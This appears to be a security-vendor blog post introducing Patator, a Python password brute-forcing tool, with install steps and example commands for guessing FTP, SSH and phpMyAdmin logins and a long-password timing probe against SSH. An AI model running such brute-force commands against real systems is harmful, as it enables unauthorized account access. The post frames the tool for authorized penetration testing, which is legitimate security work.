Patator was developed out of frustration with existing tools for password guessing attacks such as Hydra, Medusa, and Metasploit modules. It aims to offer a more reliable and flexible approach without merely repeating the shortcomings of its predecessors. Patator is a multi-threaded tool written in Python, designed to facilitate various types of password brute-forcing attacks.
Patator supports a diverse range of modules for conducting password attacks, including:
The tool encompasses many other modules aimed at brute-forcing and enumeration tasks across various services and protocols.
To install Patator, use the following commands:
git clone https://github.com/lanjelot/patator.git
git clone https://github.com/danielmiessler/SecLists.git
docker build -t patator patator/
docker run -it --rm -v $PWD/SecLists/Passwords:/mnt patator
dummy_test data=FILE0 0=/mnt/richelieu-french-top5000.txt
Here are some example commands demonstrating how to use Patator:
vsftpd/userlist$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf
-x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl
-e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST
body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=
index.php&lang=en&token=' 0=combos.txt accept_cookie=1 follow=1
While Patator is a powerful tool for penetration testing and security assessment, it is important to remember that such tools should be used responsibly and ethically. Always seek permission before attempting any kind of password attack on a system. Organizations can enhance their security posture by implementing measures such as using strong, unique passwords and enabling two-factor authentication (2FA).
Stay protected and consider registering with BitNinja for enhanced security measures.
